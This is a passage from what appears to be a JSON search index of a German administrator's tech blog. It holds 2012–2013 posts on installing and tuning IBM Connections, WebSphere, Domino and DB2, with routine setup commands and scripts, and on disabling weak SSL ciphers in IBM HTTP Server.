href=\"http://www.ibm.com/support/docview.wss?uid=swg27037856\" target=\"_blank\"\u003eSystem\nRequirements Domino Administrator \u0026amp; Domino Designer 9.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg27037859\" target=\"_blank\"\u003eSystem\nRequirements Domino 9.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg27038193\" target=\"_blank\"\u003eSystem\nRequirements Notes Traveler 9.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-21-system-requirements-ibm-notes-domino-9-are-available/","title":"System Requirements IBM Notes Domino 9 are available"},{"body":"You can download the Plugins in greenhouse catalog .\nConnections Plugins 4.0 are not compatible with IBM Notes 9 Gold. It worked with the beta editions, but not with stable.\nDirect Link More Infos at Luis Benitez Blog .\n","excerpt":"\u003cp\u003eYou can download the Plugins in\n\u003ca href=\"http://greenhouse.lotus.com/catalog\" target=\"_blank\"\u003egreenhouse catalog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eConnections Plugins 4.0 are not compatible with IBM Notes 9 Gold. It\nworked with the beta editions, but not with stable.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=C1245802A721A20185257A9B005EFD52\u0026amp;Login\" target=\"_blank\"\u003eDirect\nLink \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eMore Infos at\n\u003ca href=\"http://www.lbenitez.com/2013/03/new-ibm-connections-plug-ins-for-ibm.html\" target=\"_blank\"\u003eLuis\nBenitez Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-21-connections-plugins-4-5-for-ibm-notes-9-are-available/","title":"Connections Plugins 4.5 for IBM Notes 9 are available"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/notes/","title":"Notes"},{"body":"I had a problem last week with some customizations via custom.css in IBM Connections 3.0.1.1 CR3. Communities still use the default Layout and colors.\nI found that defaultTheme.css rewrites some of my custom.css statements. I had to add the content of custom.css to the end of the xxxTheme.css (lazy but it works), that i have a consistent color and layout change. Tests with @import are not working, because @import must be the first statement of a css file and i need to add the custom.css to the end of the xxxTheme.css.\n","excerpt":"\u003cp\u003eI had a problem last week with some customizations via custom.css in IBM\nConnections 3.0.1.1 CR3. Communities still use the default Layout and\ncolors.\u003c/p\u003e\n\u003cp\u003eI found that defaultTheme.css rewrites some of my custom.css statements.\nI had to add the content of custom.css to the end of the xxxTheme.css\n(lazy but it works), that i have a consistent color and layout change.\nTests with @import are not working, because @import must be the first\nstatement of a css file and i need to add the custom.css to the end of\nthe xxxTheme.css.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-20-connections-3-customizing-custom-css-is-not-enough/","title":"Connections 3 Customizing – custom.css is not enough"},{"body":"IBM announced CR3 for IBM Connections 4.0, that’s about 800 MB new updates. Don’t forget to update your homepage database, when you didn’t install CR2 already.\nmore: http://www.ruddigkeit.net/ [ruddigkeit.net | ..\ncollaboration and more ::..].\nUpdate: CR3 needs database updates for metrics database and cognos application! Please read this technote .\n","excerpt":"\u003cp\u003eIBM announced CR3 for IBM Connections 4.0, that’s about 800 MB new\nupdates. Don’t forget to update your homepage database, when you didn’t\ninstall CR2 already.\u003c/p\u003e\n\u003cp\u003emore: \u003ca href=\"http://www.ruddigkeit.net/\" target=\"_blank\"\u003ehttp://www.ruddigkeit.net/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n[ruddigkeit.net | ..\u003cbr\u003e\ncollaboration and\nmore ::..].\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate: \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eCR3 needs database updates for metrics database and cognos application!\nPlease \u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21616619\" target=\"_blank\"\u003eread\nthis technote \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-19-ruddigkeit-net-ibm-connections-4-0-cr3-available/","title":"ruddigkeit.net – IBM Connections 4.0 CR3 available – update"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ubuntu/","title":"Ubuntu"},{"body":"I’m really impressed of the WAS 8 installation. Install Manager can handle multiple repositories, so you can install the core package and updates in one step. That’s lots faster than installing WAS 7, Update Installer and the fixes.\nYes i know Ubuntu is unsupported for WebSphere Application Server, but i like the simple install and update process. So i use it on about 80 % of my linux testsystems and i have no problems when installing IBM Domino, WebSphere, DB2 or Connections.\nAdditional software for Ubuntu I added the following packages to Ubuntu and use x-forward for installing IM and WAS.\nRelink /bin/sh dpkg-reconfigure dash Install Firefox and SSH apt-get install firefox apt-get install openssh-server Add 32 Bit Libraries for Install Manager apt-get install libxtst6 apt-get install ia32-libs Uninstall AppArmor apt-get remove --purge apparmor* Profile Manager After WebSphere installation the profiles manager starts automatically and it WORKS! I can configure profiles on a 64 Bit Linux through it.\nService install Installing the services on Ubuntu works too with the wasservice.sh command, which fails on WAS 7.\ncd /opt/IBM/WebSphere/AppServer/bin ./wasservice.sh \\ -add Dmgr \\ -serverName dmgr \\ -profilePath /opt/IBM/WebSphere/AppServer/profiles/Dmgr01\\ -wasHome /opt/IBM/WebSphere/AppServer \\ -stopArgs \u0026#34;-username adminaccount -password password\u0026#34; ./wasservice.sh \\ -add nodeagent \\ -serverName nodeagent \\ -profilePath /opt/IBM/WebSphere/AppServer/profiles/AppSrv01 \\ -wasHome /opt/IBM/WebSphere/AppServer \\ -stopArgs \u0026#34;-username adminaccount -password password\u0026#34; I always install services for deployment manager and the nodeagents. The automatic start of my application servers i configure through the ISC and the Monitoring Policy.\nI do this, because i had several issues when starting the application servers through init or windows service and the servers work in a cluster.\nWhen you want to stop your application servers automatically on reboots, you should register a init-Skript and remove the start tasks in /etc/rcx.d for these application server services.\n","excerpt":"\u003cp\u003eI’m really impressed of the WAS 8 installation. Install Manager can\nhandle multiple repositories, so you can install the core package and\nupdates in one step. That’s lots faster than installing WAS 7, Update\nInstaller and the fixes.\u003c/p\u003e\n\u003cp\u003eYes i know Ubuntu is unsupported for WebSphere Application Server, but i\nlike the simple install and update process. So i use it on about 80 % of\nmy linux testsystems and i have no problems when installing IBM Domino,\nWebSphere, DB2 or Connections.\u003c/p\u003e\n\u003ch1 id=\"additional-software-for-ubuntu\"\u003eAdditional software for Ubuntu \u003ca href=\"#additional-software-for-ubuntu\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eI added the following packages to Ubuntu and use x-forward for\ninstalling IM and WAS.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-16-websphere-application-server-8-0-0-5-on-ubuntu-12-04-64-bit/","title":"WebSphere Application Server 8.0.0.5 on Ubuntu 12.04 64 Bit"},{"body":"I read today the requirements for IBM Connections 4.5 , which will be released on 29th of march. On point there is WebSphere Application Server V8.0.0.5 for Network Deployment.\nWebSphere Application Server V8 must be installed through Install Manager, so you have to download 4 packages for the server core and 4 packages for supplements. After this the fixes for 8.0.0.5, what do you think you many data will it be?\nYou will download more than 10 GB of Software only for WebSphere Installation! 6.x GB for V8 and about 5 GB for fixes.\nHere the Software (with some DB2 stuff):\n","excerpt":"\u003cp\u003eI read today the\n\u003ca href=\"http://pic.dhe.ibm.com/infocenter/prodguid/v1r0/clarity-reports/report/html/prereqsForProduct?deliverableId=1316596301949\" target=\"_blank\"\u003erequirements\nfor IBM Connections 4.5 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which will be released on 29th of march. On\npoint there is WebSphere Application Server V8.0.0.5 for Network\nDeployment.\u003c/p\u003e\n\u003cp\u003eWebSphere Application Server V8 must be installed through Install\nManager, so you have to download 4 packages for the server core and 4\npackages for supplements. After this the fixes for 8.0.0.5, what do you\nthink you many data will it be?\u003c/p\u003e\n\u003cp\u003eYou will download more than 10 GB of Software only for WebSphere\nInstallation! 6.x GB for V8 and about 5 GB for fixes.\u003c/p\u003e\n\u003cp\u003eHere the Software (with some DB2 stuff):\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-15-started-websphere-8-download/","title":"Started WebSphere 8 Download"},{"body":"The Default Page of Wikis shows some content for our users to offer them better work experience, but in some companies it would be good to change this text or use only one language. Content of this welcome page is set in the default language of the user who creates the wiki.\nI found the properties File for this text area in {WAS_Root}/profiles/AppSrv01/installedApps/{cellname}/Wikis.ear When you unzip the file share.services.jar, you get the path com/ibm/lconn/share/services/handlers/wiki/nls/ and there the properties-files for wikis (WikiWelcomePageMessages.properties).\nTo change the values for english, you create a file named com.ibm.lconn.share.services.handlers.wiki.nls.WikiWelcomePageMessages.properties in {Connections Shared Directory}/customization/strings/\nHere you define:\nWELCOME_MESSAGE_HTML=Your Default Wiki Welcome Text WELCOME_MESSAGE_COMMUNITY_HTML=Your Default Community Wiki Welcome Text The string can contain html markup.\nIf you want to change this in additional languages, you have to prepare files with following name: com.ibm.lconn.share.services.handlers.wiki.nls.WikiWelcomePageMessages_{LanguageCode}.properties\n","excerpt":"\u003cp\u003eThe Default Page of Wikis shows some content for our users to offer them\nbetter work experience, but in some companies it would be good to change\nthis text or use only one language. Content of this welcome page is set\nin the default language of the user who creates the wiki.\u003c/p\u003e\n\u003cp\u003eI found the properties File for this text area in\n\u003ccode\u003e{WAS_Root}/profiles/AppSrv01/installedApps/{cellname}/Wikis.ear\u003c/code\u003e When\nyou unzip the file \u003ccode\u003eshare.services.jar\u003c/code\u003e, you get the path\n\u003ccode\u003ecom/ibm/lconn/share/services/handlers/wiki/nls/\u003c/code\u003e and there the\nproperties-files for wikis (\u003ccode\u003eWikiWelcomePageMessages.properties\u003c/code\u003e).\u003c/p\u003e\n\u003cp\u003eTo change the values for english, you create a file named\n\u003ccode\u003ecom.ibm.lconn.share.services.handlers.wiki.nls.WikiWelcomePageMessages.properties\u003c/code\u003e\nin \u003ccode\u003e{Connections Shared Directory}/customization/strings/\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eHere you define:\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-12-customizing-connections-4-wikis-default-page/","title":"Customizing Connections 4 Wikis Default (Welcome) Page"},{"body":"Connections 4.5 will be available on 29th of march.\nmore via stephankopp.net ","excerpt":"\u003cp\u003eConnections 4.5 will be available on 29th of march.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://stephankopp.net/2013/03/12/ibm-notesdomino-9-0-will-be-available-on-21st-of-march/\" target=\"_blank\"\u003emore \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://stephankopp.net\" target=\"_blank\"\u003estephankopp.net \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-03-12-stephankopp-net-ibm-notesdomino-9-0-will-be-available-on-21st-of-march-and-connection-4-5-on-march-29/","title":"StephanKopp.net: IBM Notes/Domino 9.0 will be available on 21st of March and Connection 4.5 on March 29"},{"body":"After skripting jdbc and j2ee on WebSphere i was interested to fasten the DB2 configuration after a Connections installation.\nThere are two ways to get valid source xml-Files for automatic maintenance in DB2. I use automatic maintenance, because i can set a maximum backup time and how many dumps of one database should be stored. DB2 deletes old backups (which i have in a filebackup each night) automatically.\nYou can’t script this settings directly, IBM provides two system calls for this: sysproc.automaint_set_policyfile and sysproc.automaint_set_policy.\nI use the file variant here, because i think it easier to handle files than blob content.\nSample Files In /opt/ibm/db2/v9.7/samples/automaintcfg you can find example files for all settings within automatic maintenance.\nYou can edit them and then put them to INSTANCE_ROOT/sqllib/tmp (on Linux|AIX /home/db2inst1/sqllib/tmp).\nThe xml-Files must have read/write rights for db2fenc1 user or db2iadm group!\nExport settings from db2 You can setup one of the connections databases for automatic maintenance (timeperiods, backup path, and so on). These settings can be done through db2cc or DB2 Data Studio. After providing all needed parameters you can export these settings through db2 commandline interface.\nconnect to homepage call sysproc.automaint_get_policyfile(\u0026#39;AUTO_BACKUP\u0026#39;,\u0026#39;DB2AutoBackupPolicy.xml\u0026#39;) call sysproc.automaint_get_policyfile(\u0026#39;AUTO_RUNSTATS\u0026#39;,\u0026#39;DB2AutoRunStatsPolicy.xml\u0026#39;) call sysproc.automaint_get_policyfile(\u0026#39;AUTO_REORG\u0026#39;,\u0026#39;DB2AutoReorgPolicy.xml\u0026#39;) call sysproc.automaint_get_policyfile(\u0026#39;MAINTENANCE_WINDOW\u0026#39;,\u0026#39;DB2AutoMaintenancePolicy.xml\u0026#39;) The files get automatically stored to INSTANCE_ROOT/sqllib/tmp.\nSet automatic maintenance through script I created a script with following code (e.g. setbackup.sql):\nconnect to peopledb; update db cfg using AUTO_MAINT ON; update db cfg using AUTO_DB_BACKUP ON; update db cfg using AUTO_TBL_MAINT ON; update db cfg using AUTO_RUNSTATS ON; update db cfg using AUTO_STATS_PROF ON; update db cfg using AUTO_PROF_UPD ON; update db cfg using AUTO_REORG ON; call sysproc.automaint_set_policyfile(\u0026#39;AUTO_BACKUP\u0026#39;,\u0026#39;DB2AutoBackupPolicy.xml\u0026#39;); call sysproc.automaint_set_policyfile(\u0026#39;AUTO_RUNSTATS\u0026#39;,\u0026#39;DB2AutoRunStatsPolicy.xml\u0026#39;); call sysproc.automaint_set_policyfile(\u0026#39;AUTO_REORG\u0026#39;,\u0026#39;DB2AutoReorgPolicy.xml\u0026#39;); call sysproc.automaint_set_policyfile(\u0026#39;MAINTENANCE_WINDOW\u0026#39;,\u0026#39;DB2AutoMaintenancePolicy.xml\u0026#39;); commit; You have to copy this for all databases where you want to configure automatic maintenance!\nAfter a full IBM Connections installation this are: blogs, cognos, dogear, files, forum, homepage, metrics, mobile, opnact, peopledb, sncomm, wikis.\nSo you have to copy the text block 10 times and change the “connect to” line.\nNow you can apply the settings with db2 -tvf setbackup.sql and you’re done. Restart db2admin or the database server after these settings.\nPrerequists Automatic maintenance needs a TOOLSDB! Without it the configured tasks will not start. When you forgot to enable TOOLSDB on the DB2 setup, you can create one with:\ndb2 create tools catalog cc create new database toolsdb You can check if a TOOLSDB is present and configured with: db2 get admin configuration\nLast lines should be:\n[...] Tools Catalog Database (TOOLSCAT_DB) = TOOLSDB Tools Catalog Database Instance (TOOLSCAT_INST) = db2inst1 Tools Catalog Database Schema (TOOLSCAT_SCHEMA) = CC [...] Example SQL File (for all Connections Databases) setbackup.sql ","excerpt":"\u003cp\u003eAfter skripting jdbc and j2ee on WebSphere i was interested to fasten\nthe DB2 configuration after a Connections installation.\u003c/p\u003e\n\u003cp\u003eThere are two ways to get valid source xml-Files for automatic\nmaintenance in DB2. I use automatic maintenance, because i can set a\nmaximum backup time and how many dumps of one database should be stored.\nDB2 deletes old backups (which i have in a filebackup each night)\nautomatically.\u003c/p\u003e\n\u003cp\u003eYou can’t script this settings directly,\n\u003ca href=\"http://pic.dhe.ibm.com/infocenter/db2luw/v9r7/index.jsp?topic=%2Fcom.ibm.db2.luw.sql.rtn.doc%2Fdoc%2Fr0052292.html\" target=\"_blank\"\u003eIBM\nprovides \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n two system calls for this: \u003ccode\u003esysproc.automaint_set_policyfile\u003c/code\u003e\nand \u003ccode\u003esysproc.automaint_set_policy\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eI use the file variant here, because i think it easier to handle files\nthan blob content.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-01-30-skripting-db2-automatic-maintenance/","title":"Skripting DB2 Automatic Maintenance"},{"body":"Setting the performance tuning parameters for all datasources in WebSphere Application Server (for IBM Connections 4 ) is a really annoying job with lots of mouse clicks.\nI searched a way to make these through wsadmin with a jython script and after some testing i wrote one, which set all parameters for the Connections DataSources as described in IBM Connections 4 Performance Tuning Guide .\nI set StatementCacheSize, minConnections and maxConnections with this script.\nDownload: changeDataSourceParameters Using this script Copy this script to your server and copy \u0026amp; paste it to a wsadmin-Session, or start wsadmin with\nwsadmin.(sh|bat) -lang jython -username youruser -password password -f path/changeDataSourceParameter.py I didn’t include error handling. When a DataSource is not configured, then the script will terminate!\nMore details Disclaimer I use this script in several installations without problem, but i’m not responsible, when you break your systems or loose data!\nIf you find errors, you can comment or send me a mail, but i will not provide support for this script.\n","excerpt":"\u003cp\u003eSetting the performance tuning parameters for all datasources in\n\u003ca href=\"http://www-01.ibm.com/software/webservers/appserv/was/\" target=\"_blank\"\u003eWebSphere\nApplication Server \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (for\n\u003ca href=\"http://www-01.ibm.com/software/lotus/products/connections/technical-cv4.html\" target=\"_blank\"\u003eIBM\nConnections 4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n) is a really annoying job with lots of mouse clicks.\u003c/p\u003e\n\u003cp\u003eI searched a way to make these through wsadmin with a jython script and\nafter some testing i wrote one, which set all parameters for the\nConnections DataSources as described in\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/dx/IBM_Connections_4.0_Performance_Tuning_Guide\" target=\"_blank\"\u003eIBM\nConnections 4 Performance Tuning Guide \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI set StatementCacheSize, minConnections and maxConnections with this\nscript.\u003c/p\u003e\n\u003ch1 id=\"download\"\u003eDownload: \u003ca href=\"#download\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003ca href=\"https://github.com/stoeps13/ibmcnx2/blob/master/ibmcnx/config/DataSources.py\" target=\"_blank\"\u003echangeDataSourceParameters \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"using-this-script\"\u003eUsing this script \u003ca href=\"#using-this-script\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eCopy this script to your server and copy \u0026amp; paste it to a\nwsadmin-Session, or start wsadmin with\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-01-10-setting-datasources-with-wsadmin/","title":"Setting dataSource/JDBC parameters with wsadmin"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/activity-stream/","title":"Activity Stream"},{"body":"With Connections Fixpack CR1 we had a problem, that profile pictures didn’t show up when we opened an activity stream entry:\nWith CR2 the profile pictures get not replaced with a grey head icon:\n","excerpt":"\u003cp\u003eWith Connections Fixpack CR1 we had a problem, that profile pictures\ndidn’t show up when we opened an activity stream entry:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/01/2013-01-04_20-52-32.png\" alt=\"2013 01 04 20 52 32\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eWith CR2 the profile pictures get not replaced with a grey head icon:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/01/2013-01-04_20-51-51.png\" alt=\"2013 01 04 20 51 51\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-01-04-connections-4-cr2-solves-picture-problem-on-homepage-activity-stream/","title":"Connections 4 CR2 solves picture problem on homepage / activity stream"},{"body":"Last week i want to build a “light” Connections Installation to test some things like OAuth and Customizing. So i installed Domino 9 Beta on Ubuntu 12.04 64 Bit, DB2 9.5.7 Express and WebSphere. I deployed the homepage and the profiles databases. After this i want to install the required applications of Connections (Homepage, Search and News) and Profiles.\nInstallation shows no more dependencies and i started up my Connections after install. Modules are looking good, but when i want to add a status update the windows opens, but show no buttons to Save the Status. Even on homepage or people views i can’t add status updates.\nI had a look on a full installation and found “Files” addin in the Status Update Overlay. So i deployed filesDB and the application. Files was added to the overlay window, but still no buttons to save or cancel.\nIn Firebug i see that i get errors on some communities modules. So i deployed sncomm database and the communities application. After firing up Connections i can save Status Updates. It is enough to install Communities, the application mustn’t run! So i removed the autostart of communities and can use a lighter system, which runs on my notebook to test several things.\nRed parts in this screenshots come with Files, blue ones with Communities Application.\nI think IBM should document these dependencies in Connections Wiki or in the Installation Manager. I found no descriptions of dependencies in IM or the Wiki.\n","excerpt":"\u003cp\u003eLast week i want to build a “light” Connections Installation to test\nsome things like OAuth and Customizing. So i installed Domino 9 Beta on\nUbuntu 12.04 64 Bit, DB2 9.5.7 Express and WebSphere. I deployed the\nhomepage and the profiles databases. After this i want to install the\nrequired applications of Connections (Homepage, Search and News) and\nProfiles.\u003c/p\u003e\n\u003cp\u003eInstallation shows no more dependencies and i started up my Connections\nafter install. Modules are looking good, but when i want to add a status\nupdate the windows opens, but show no buttons to Save the Status. Even\non homepage or people views i can’t add status updates.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-12-30-dependencies-connections-4-applications/","title":"Dependencies Connections 4 Applications"},{"body":"I read an open APAR on IBM Connections today (login required!): LO73245 Description:\nTDI’s sync_all_users.sh doesn’t allow us to import departmentNumbers longer than 16 chars, although the database schema supports values up to 24 chars.\nAnd as local solution:\nworked around the issue with creating a custom field\nI had a very similar problem with validation of LDAP Search filter (which is saved in employee-table too) and searched longer to solve this (I set sync_store_source_url=false), but the real error was like here in validate_dbrepos_fields.properties.\nWhen you open validate_dbrepos_fields.properties (in your tdisol directory) you found following:\ndeptNumber=16\nSo here is the validation error and not in the database! You can solve the APAR without using a customField, when you set deptNumber to 24.\n","excerpt":"\u003cp\u003eI read an open APAR on IBM Connections today (login required!):\n\u003ca href=\"https://www-304.ibm.com/support/entdocview.wss?uid=swg1LO73245\u0026amp;myns=swglotus\u0026amp;mynp=OCSSYGQH\u0026amp;mync=R\" target=\"_blank\"\u003eLO73245 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eDescription:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eTDI’s sync_all_users.sh doesn’t allow us to import departmentNumbers\nlonger than 16 chars, although the database schema supports values up to\n24 chars.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eAnd as local solution:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eworked around the issue with creating a custom field\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eI had a very similar problem with validation of LDAP Search filter\n(which is saved in employee-table too) and searched longer to solve this\n(I set sync_store_source_url=false), but the real error was like here in\nvalidate_dbrepos_fields.properties.\u003c/p\u003e\n\u003cp\u003eWhen you open validate_dbrepos_fields.properties (in your tdisol\ndirectory) you found following:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003edeptNumber=16\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eSo here is the validation error and not in the database! You can solve\nthe APAR without using a customField, when you set deptNumber to 24.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-12-29-cnxlo73245/","title":"IBM Connections APAR LO73245"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tivoli-directory-integrator/","title":"Tivoli Directory Integrator"},{"body":"Klaus Bild provided two scripts for setting Connections Admins through jython and wsadmin.\nI want to add one detail, when you want to add multiple Admins, then you can use pipe | as delimiter.\nFirst line would be\nconnwasadmin='wasadmin|conadmin'\nThanks Klaus, i like to set the admins through a script, because fixpack installations often set the j2ee roles to default.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://kbild.ch/2012/11/add-admin-users-to-connections-4-security-roles-still-the-easy-way/?utm_source=feedburner\u0026amp;utm_medium=feed\u0026amp;utm_campaign=Feed%3A\u0026#43;kbild\u0026#43;%28kbild\u0026#43;-\u0026#43;Mehr\u0026#43;als\u0026#43;die\u0026#43;gelbe\u0026#43;Welt%29\" target=\"_blank\"\u003eKlaus\nBild provided two scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for setting Connections Admins through jython\nand wsadmin.\u003c/p\u003e\n\u003cp\u003eI want to add one detail, when you want to add multiple Admins, then you\ncan use pipe | as delimiter.\u003c/p\u003e\n\u003cp\u003eFirst line would be\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003econnwasadmin='wasadmin|conadmin'\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eThanks Klaus, i like to set the admins through a script, because fixpack\ninstallations often set the j2ee roles to default.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-11-09-klaus-bild-add-admin-users-to-connections-4-security-roles-the-easy-way/","title":"Klaus Bild – Add admin users to Connections 4 security roles – the easy way"},{"body":"Today Luis Benitez annouced the new Connections 4 Plugins for Lotus Notes .\nThe zip-file contains all three operating system installer. Windows, Linux and Mac, but i had no success to install through xpd.mac-addon.pgk, because the preinstall script stop the installation.\nYou can open this file in finder:\n]\n]\nNow you can copy the updatesite folder to an other place and use File – Application – Install in Lotus Notes. Point the Install to the updatesite folder and install the whole package. I have to restart twice, but after this i can use the new Status Update, Files and Activities Plugins.\n","excerpt":"\u003cp\u003eToday\n\u003ca href=\"http://www.lbenitez.com/2012/11/announcing-ibm-connections-40-plug-ins.html#disqus_thread\" target=\"_blank\"\u003eLuis\nBenitez annouced \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n the new\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=C1245802A721A20185257A9B005EFD52\" target=\"_blank\"\u003eConnections\n4 Plugins for Lotus Notes \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eThe zip-file contains all three operating system installer. Windows,\nLinux and Mac, but i had no success to install\nthrough xpd.mac-addon.pgk, because the preinstall script stop the\ninstallation.\u003c/p\u003e\n\u003cp\u003eYou can open this file in finder:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/11/2012-11-06_2135.png\" alt=\"image:image:/images/2012/11/2012-11-06_2135.png[image\" /\u003e\n\u003c/p\u003e\n\n]\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/11/2012-11-06_2137.png\" alt=\"image:image:/images/2012/11/2012-11-06_2137.png[image\" /\u003e\n\u003c/p\u003e\n\n]\u003c/p\u003e\n\u003cp\u003eNow you can copy the updatesite folder to an other place and use File –\nApplication – Install in Lotus Notes. Point the Install to the\nupdatesite folder and install the whole package. I have to restart\ntwice, but after this i can use the new Status Update, Files and\nActivities Plugins.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-11-06-install-ic4-lotus-notes-plugins-on-mac-os-x-10-8-x/","title":"Install IC4 Lotus Notes Plugins on Mac OS X 10.8.x"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/plugin/","title":"Plugin"},{"body":"Preamble Before i begin with my securing article, i want to say something on security on IBM Connections. Mainly i don’t like the thing, that IBM only support very special versions of software.\nSo we must use WebSphere 7.0.0.21, DB2 9.7.0.5, IHS 7.0.0.11 and so on. Each product had updates the last months and i think we won’t get support when we use other versions.\nSo i have to chances. On the first side i can update my software to limit vulnerabilities and get perhaps no support, or i will have vulerable software with support.\nJust my 2 cent and i hope i will get answer, if i will get support with higher program versions.\nSSL and IHS One of our customers had a pentest the last months and had some vulnerabilities with IBM HTTP Server (IHS), which is used to access IBM Connections.\nI used a 2048 Bit key for ssl which was generated with iKeyman, but the pentest doc told me, that short keys were used for encryption (smaller 112 bit). So i read a little bit.\nThis 2048 bit mean the public key of my hostkey. SSL uses this key to encrypt the connection between browser and webserver. Within the ssl handshake session keys are generated on basis of this hostkey. Browser and Server check which protocols are enabled on both sides and use one of the protocols both support.\nYou can check your SSL enabled server here: https://www.ssllabs.com/ssltest/index.html .\nInformation on ciphers with IHS: http://www-01.ibm.com/software/webservers/httpservers/doc/v10/ibm/9acdciph.htm You can limit the available ciphers and protocols on your IBM HTTP Server.\nFirst you should disable SSL v2: SSLProtocolDisable SSLv2\nI configure the directives in my virtual hosts section:\nListen 0.0.0.0:443 ServerName connections.example.com SSLEnable SSLProtocolDisable SSLv2 SSLCipherSpec 3A SSLCipherSpec 34 SSLCipherSpec 35 SSLCipherSpec 2F SSLCipherSpec 35b Poorly TLS v1.1 and v1.2 support comes with IHS 8 and we can’t use it with IHS 7.\nThis is my first article on securing IHS and Connections. Next 